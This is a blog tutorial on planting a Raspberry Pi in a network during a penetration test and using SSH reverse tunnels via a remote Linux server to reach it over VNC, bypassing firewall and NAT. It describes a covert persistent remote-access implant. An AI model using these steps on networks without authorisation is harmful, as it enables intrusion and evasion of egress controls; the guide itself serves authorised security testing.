Make Some Raspberry Hole Punch!

29 Jan 2018

In a penetration test or security audit of a network, a Raspberry Pi can be planted within the network to act as a man inside.
By using a third party server across the internet, we can abuse the fact that most firewalls are configured to do strict checking on ingress traffic and are very lax on egress packets. By using an outbound connection we can ignore NAT and port forwarding by tunneling the traffic to a Linux server, this is often referred to as hole punching. OpenSSH allows us to do this with some scripting. A crude remote access tool can be created using a Raspberry Pi to conduct information gathering.

Required

We will be using Linux for this document. Some servers may not have port forwarding enabled for security reason as you
could spoof IP traffic that looks like its originating from the SSH server.

On the note of security, I have written the SSH forward to bind to the ‘localhost’ on our Linux host. This means your
data is not exposed to the internet. However, it is exposed to all users who can login to the Linux server with a valid
account. If you are going to use this guide it is mandatory to change the default password because other users can
ind your port number and attempt to login. This can be accomplished by running the following commands as pi:

We use RSA key pairs for SSH. It is important to note that at the end of this tutorial your Raspberry Pi will contain
a private key (id_rsa) that allows a login to your Linux server. If you lose your private key or believe it is
compromised you must remove it from your authorized_keys file on your remote Linux to prevent someone impersonating your account.

Setting up the Pi

We will utilize public key authentication to allow the Pi to login to Linux without a password prompt. This method utilizes a RSA key pair to bypass the need for a password.

ssh-keygen # Run as pi
Enter file in which to save the key (/home/pi/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:

For the three prompts we will just hit enter (blank), if done successfully you will see:

So my home directory is /home/r/rosshiga. I’ll copy my public key to /home/r/rosshiga/.ssh/pi.pub on remote Linux.
The easiest way to copy files is SSH since both the server and Pi have SSH.
The scp utility will use SSH to copy files on the Pi

cat pi.pub >> authorized_keys can be broken down. cat “file” will be the contents of the file and » is a standard
redirection to append to another file. So what the terminal is doing is reading out out public key and appending it to
the authorized list. If you are successful at this, future SSH sessions will not require a password on the pi.

Once we verify no password is required we can setup forwarding for our VNC port 5900 to Linux. First let’s verify
that we can tunnel the VNC port to a test port 4444. (You should pick your own port number > 10000)

ssh -v -R localhost:4444:localhost:5900 rosshiga@uhLinux.hawaii.edu

This command tells ssh to tunnel the (R)emote (UH Linux) port localhost:4444 to the local port localhost:5900. This in
effect maps our VNC port to a port on Linux. You will see many debug messages because of the -v option but your are
looking for a forwarding success message.

Once that is saved test the service sudo systemctl start autossh, if reported as running by sudo systemctl status autosshthen enable the autossh service on boot by issuing sudo systemctl enable autossh.

Using the tunnel

All the setup is done and you will no longer need to make any changes on the Pi or Linux. We just need to utilize the
tunnel. Our tunnel port in this example is 4444. We will use two methods to connect to the Pi.

OpenSSH (Windows (beta)/OS X/Linux)

Issue this command on your local machine:

ssh -v -L localhost:5900:localhost:4444 rosshiga@uhLinux.hawaii.edu

This tells SSH to do a (L)ocal foward from your machine port 5900 to the remote machine localhost:4444.
In our case it’s binding to your port 5900 and forwarding it to port 4444 on Linux, but 4444 on Linux is 5900 on our Pi thus completing the tunnel

PuTTY

Use this image as a reference for your PuTTY:

Connecting VNC

You will be able to connect to the Pi using the address localhost:5900 as long as both tunnels (Pi-Linux and Linux-Local)
are connected. See below